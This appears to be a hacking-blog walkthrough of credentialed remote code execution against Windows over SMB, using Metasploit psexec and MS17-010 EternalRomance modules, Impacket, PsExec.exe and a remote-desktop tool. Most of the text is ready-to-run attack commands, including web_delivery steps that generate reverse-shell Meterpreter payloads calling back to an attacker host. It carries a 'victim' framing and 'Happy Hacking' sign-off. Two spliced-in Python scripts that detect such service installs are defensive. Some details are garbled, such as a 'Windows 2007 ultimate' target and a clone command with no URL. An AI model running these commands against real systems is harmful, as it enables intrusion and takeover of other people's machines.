- Microsoft Windows Authenticated User Code Execution
- Microsoft Windows Authenticated Powershell Command Execution
- Microsoft Windows Authenticated Administration Utility
- SMB Impacket WMI Exec
- Impacket (psexec)
- Impacket (exec)
- PsExec.exe
- Atelier Web Remote Commander
- MS17-010 EternalRomance SMB Remote code execution
- MS17-010 EternalRomance SMB Remote command execution
Tested on: Windows Server 2008 R2
Attacking Machine: Kali Linux
Microsoft Windows Authenticated User Code Execution
This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ignite@123
msf exploit(windows/smb/psexec) > exploit
Here:
- rhost: IP of the victim PC
- smbuser: username
- smbpass: password
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-rUu1EaD2_g8/W4oz9nFf9UI/AAAAAAAAaCA/atmDMf8fM-ore9-NGH2mBXtCN-E-0mjwACEwYBhgL/s1600/1.png?w=687&ssl=1)
Once the commands run you will gain a Meterpreter session on your victim's PC and can access it as you want.
Microsoft Windows Authenticated Powershell Command Execution
This module uses a valid administrator username and password to execute a PowerShell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the command line using the -EncodedCommand flag. Using this method, the payload is never written to disk and, given that each payload is unique, is less prone to signature-based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a PowerShell invocation which hides the window entirely.
msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123
msf exploit(windows/smb/psexec_psh) > exploit
Once again, as the commands run you will gain a Meterpreter session on the victim's PC, and you can do as you wish.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ZxbGdVg37ao/W4oz_F0OemI/AAAAAAAAaCQ/yY-0yhRRY28Ywkc_HHircOMPhGg4ZP9VACEwYBhgL/s1600/2.png?w=687&ssl=1)
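Both modules above install a service on the target over SMB: the first under a randomly chosen name, the second with a base64-encoded PowerShell command as the service binary. As an added example, not part of the original article, the Python below scores constructed Windows System log 7045 ("a service was installed") records for those traits against a per-host baseline; the sample events, allowlist and regexes are my own assumptions.

```python
import re

# Constructed System-log records (Event ID 7045), reduced to the fields the
# check needs. Not real log data; the encoded payload is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "gupdate",
     "ImagePath": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc'},
    {"EventID": 7045, "ServiceName": "XjRkPaQw",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
                  "-e PLACEHOLDER_BASE64"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": ""},
]

# Services this host is expected to install (a per-environment allowlist).
BASELINE = {"gupdate", "WinDefend"}

# powershell[.exe] ... -e/-ec/-enc/-encodedcommand <blob>
_ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)
# A command interpreter registered as the service binary itself.
_SHELL_AS_SERVICE = re.compile(r"%COMSPEC%|\bcmd(?:\.exe)?\s+/[bc]\b", re.IGNORECASE)
# Service binary referenced by UNC path (\\host\share\...).
_UNC_BINARY = re.compile(r"^\s*\"?\\\\[^\\]+\\")


def score_service_install(event: dict, baseline=BASELINE) -> list:
    """Reasons a 7045 event resembles psexec-style remote execution.

    Returns [] for non-7045 events and for installs that look benign. Each
    reason is independent, so several can apply to one event.
    """
    if event.get("EventID") != 7045:
        return []
    name, image = event.get("ServiceName", ""), event.get("ImagePath", "")
    reasons = []
    if name not in baseline:
        reasons.append("service not in baseline")
    if name.upper() == "PSEXESVC":
        reasons.append("Sysinternals PsExec service")
    if _ENCODED_PS.search(image):
        reasons.append("encoded PowerShell in ImagePath")
    if _SHELL_AS_SERVICE.search(image):
        reasons.append("command shell launched as a service")
    if _UNC_BINARY.search(image):
        reasons.append("service binary on a network share")
    return reasons


def flagged_installs(events, baseline=BASELINE) -> list:
    """(ServiceName, reasons) for every event that scored at least one reason."""
    out = []
    for ev in events:
        reasons = score_service_install(ev, baseline)
        if reasons:
            out.append((ev.get("ServiceName", ""), reasons))
    return out


if __name__ == "__main__":
    for name, reasons in flagged_installs(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(reasons)}")
```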
Microsoft Windows Authenticated Administration Utility
This module uses a valid administrator username and password to execute an arbitrary command on one or more hosts, using a similar technique to the "psexec" utility provided by SysInternals. Daisy-chaining commands with '&' does not work and users shouldn't try it. This module is useful because it doesn't need to upload any binaries to the target machine.
Thus, in a newer Metasploit framework we used the web delivery module to generate a malicious DLL-loading command, which we can pass as the arbitrary command to run on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-nF2YQfDj2A4/W4oz_u6GkQI/AAAAAAAAaCM/gJCvANEywmglHs1IlQiuAxa4UhyzXNhBgCEwYBhgL/s1600/4.png?w=687&ssl=1)
Copy the highlighted text: this is the malicious DLL command.
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-uDfQHWCjcro/W4oz_jI8RRI/AAAAAAAAaCM/XjJ9E65p5iUZBz7VdBhH9JihYxLJgVTVwCEwYBhgL/s1600/5.png?w=687&ssl=1)
As soon as we run the psexec auxiliary module we get a Meterpreter session as administrator.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-aIifFaVQoCA/W4oz_8vGhAI/AAAAAAAAaCU/kpifMXxNHuAHZ_QL87ZZjks-ZXkq_pCeACEwYBhgL/s1600/6.png?w=687&ssl=1)
SMB Impacket WMI Exec
This module takes a similar approach to psexec but executes commands through WMI.
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.1.104
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123
msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit
![[Image: 7.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-A6iVrxBivQs/W4o0AXmCthI/AAAAAAAAaCY/syYfRW8QlCY80nOMqXYHGNNfxDfjv5ONgCEwYBhgL/s1600/7.1.png?w=687&ssl=1)
Impacket for Psexec.py
Psexec.py lets you execute processes on remote Windows systems, copy files to remote systems, process their output and stream it back. It allows execution of remote shell commands directly with a full interactive console without having to install any client software.
Now let's install the Impacket tools from GitHub. First clone the repository, then install Impacket, and then run psexec.py to connect to the victim's machine.
git clone
cd impacket/
python setup.py install
cd examples
Syntax: ./psexec.py [[domain/]username[:password]@]<target IP address>
./psexec.py SERVER/Administrator:Ignite@123@192.168.1.104
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-QZUUjZQFZs8/W4o0Af8NblI/AAAAAAAAaCQ/w9nwN1ffFHcNiu5h0shHohX6UY4dtmWDwCEwYBhgL/s1600/7.png?w=687&ssl=1)
Impacket for Atexec.py
This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
Syntax: ./atexec.py [[domain/]username[:password]@]<target IP address> <command>
./atexec.py SERVER/Administrator:Ignite@123@192.168.1.104 systeminfo
As you can see below, a remote connection was established to the server and the command systeminfo was run on the target, with the output of the command delivered to the Kali terminal.
![[Image: 9.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-3dw1ZvAgQlU/W4o0AjFnjsI/AAAAAAAAaCU/fkgC5F9mCJ44B94_yYeqAN-_Pdm2uMrlACEwYBhgL/s1600/9.1.png?w=687&ssl=1)
PsExec.exe
Psexec.exe is software that lets us access other computers in a network. It takes us directly to the shell of the remote PC without any manual set-up on the remote side. Download the software, unzip it, then open a command prompt and type:
PsExec.exe \\192.168.1.104 -u administrator -p Ignite@123 cmd
Here,
192.168.1.104 –> is the IP of the remote host
-u –> denotes username
-p –> denotes password
cmd –> to enter victim’s command prompt
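Every tool in these sections (PsExec.exe, psexec.py and the Metasploit psexec modules) works by installing a temporary service on the target, and the target's System log records that install as Event ID 7045. As an added example that is not part of the original post, this Python script flags such installs in constructed, flattened 7045 records; the PSEXESVC name and the two image-path heuristics are rules assumed for illustration, not a complete detection.

```python
import re

# Constructed sample of Windows System-log "A service was installed" records (Event ID
# 7045), flattened to key=value lines for this example; not captures from the post's lab.
SAMPLE_EVENTS = [
    "EventID=7045 Host=WS01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe Account=LocalSystem",
    "EventID=7045 Host=WS01 ServiceName=eKfBqZxT ImagePath=%SystemRoot%\\uYbRpQwE.exe Account=LocalSystem",
    "EventID=7045 Host=WS02 ServiceName=Spooler2 ImagePath=%SystemRoot%\\System32\\spoolsv.exe Account=LocalSystem",
    "EventID=7045 Host=WS03 ServiceName=MgmtSvc ImagePath=%COMSPEC% /c example.bat Account=LocalSystem",
    "EventID=7036 Host=WS01 ServiceName=PSEXESVC State=stopped",
]

# key=value pairs; a value runs until the next " Key=" token, so paths with spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")
# Sysinternals PsExec.exe installs its helper service under this fixed name.
PSEXEC_SERVICE_NAMES = {"PSEXESVC"}
# An .exe directly in the Windows root is where a file pushed over ADMIN$ lands (psexec.py style).
SYSROOT_EXE_RE = re.compile(r"^(%SystemRoot%|[A-Za-z]:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)
# A service whose "binary" is a cmd.exe one-liner (psexec_command style; heuristic assumed here).
SHELL_SERVICE_RE = re.compile(r"^(%COMSPEC%|cmd(\.exe)?)\s+/c\b", re.IGNORECASE)

def parse_event(line):
    """Turn one flattened record into a dict of its fields."""
    return dict(FIELD_RE.findall(line))

def classify(event):
    """Return the reasons a 7045 record looks like remote-execution tooling ([] if none)."""
    if event.get("EventID") != "7045":
        return []
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    reasons = []
    if name.upper() in PSEXEC_SERVICE_NAMES:
        reasons.append("known PsExec service name")
    if SYSROOT_EXE_RE.match(path):
        reasons.append("service binary dropped directly into the Windows root (ADMIN$ share)")
    if SHELL_SERVICE_RE.match(path):
        reasons.append("service binary is a command-shell one-liner")
    return reasons

def find_suspicious(lines):
    """Return (host, service name, reasons) for every record that trips a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append((event.get("Host"), event.get("ServiceName"), reasons))
    return hits
```

Running `find_suspicious(SAMPLE_EVENTS)` flags the PSEXESVC install, the random-named binary in the Windows root and the shell one-liner service, while the System32 service and the non-7045 record pass.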
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-edEs7FC_7FQ/W4o0BHpp56I/AAAAAAAAaCY/w3LtbzZ05jM0EkbxKKk9u18epgqpJMZFACEwYBhgL/s1600/9.png?w=687&ssl=1)
Atelier Web Remote Commander
This is graphical software that lets us gain control of the victim's PC quite easily.
Once you have opened the software, enter the IP address of the victim's PC in the remote host box along with the username and password in their respective boxes, then click Connect; the victim's whole screen will appear on your desktop and you will have a clear view of what the victim is doing.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-RgBnSN7nHB0/W4oz9nUNHcI/AAAAAAAAaCU/rEwybaG_joc0dcxGRvzcDBF6D3u3bX62wCEwYBhgL/s1600/10.png?w=687&ssl=1)
As you can observe, the victim's screen is now in front of us.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-gYG4ALQSWzg/W4oz9t8WWKI/AAAAAAAAaCM/SJ0qXD16ZxIYKiET_3ElRCGKzipOofHPwCEwYBhgL/s1600/11.png?w=687&ssl=1)
MS17-010 EternalRomance SMB Remote Code Execution
Tested on: Windows 2007 ultimate
Attacking Machine: Kali Linux
This module exploits the MS17-010 SMB vulnerabilities to achieve a write-what-where primitive, which is then used to overwrite the connection session information so that it appears as an Administrator session. From there, the normal psexec payload code execution is done. It exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.105
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-yvYGeD6H3jg/W4oz-VdmfMI/AAAAAAAAaCE/16P_kxBrPzQlNII5on2nv7zA3AI82PQKACEwYBhgL/s1600/12.png?w=687&ssl=1)
MS17-010 EternalRomance SMB Remote Command Execution
This module exploits the MS17-010 SMB vulnerabilities to achieve a write-what-where primitive, which is then used to overwrite the connection session information so that it appears as an Administrator session. From there, the normal psexec command execution is done. It exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.
As before, we use the web_delivery module in a new Metasploit console to generate the malicious dll code, which we then pass to the module as the arbitrary command to run on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for malicious dll code.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-tKyEUMXosQA/W4oz-oDkWHI/AAAAAAAAaCI/G9Cqm0eT-cEEsgDK0TeO-7f_FNHFf1sXwCEwYBhgL/s1600/13.png?w=687&ssl=1)
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.105
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-eSoIjxatjd0/W4oz-zaaEWI/AAAAAAAAaCI/y1Z-blUmuuYzUDwbUIVBzF9iKd-0btoMACEwYBhgL/s1600/14.png?w=687&ssl=1)
As soon as we run the auxiliary module we get a meterpreter session as administrator.
In this way, we can compromise a victim's machine remotely if we have its login credentials.
Happy Hacking!!!!
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-y0iYx0a5P8w/W4oz-zSI9lI/AAAAAAAAaCY/G1IDkRnV0HgfHoZCBK5YwzpHOgXckh5SQCEwYBhgL/s1600/15.png?w=687&ssl=1)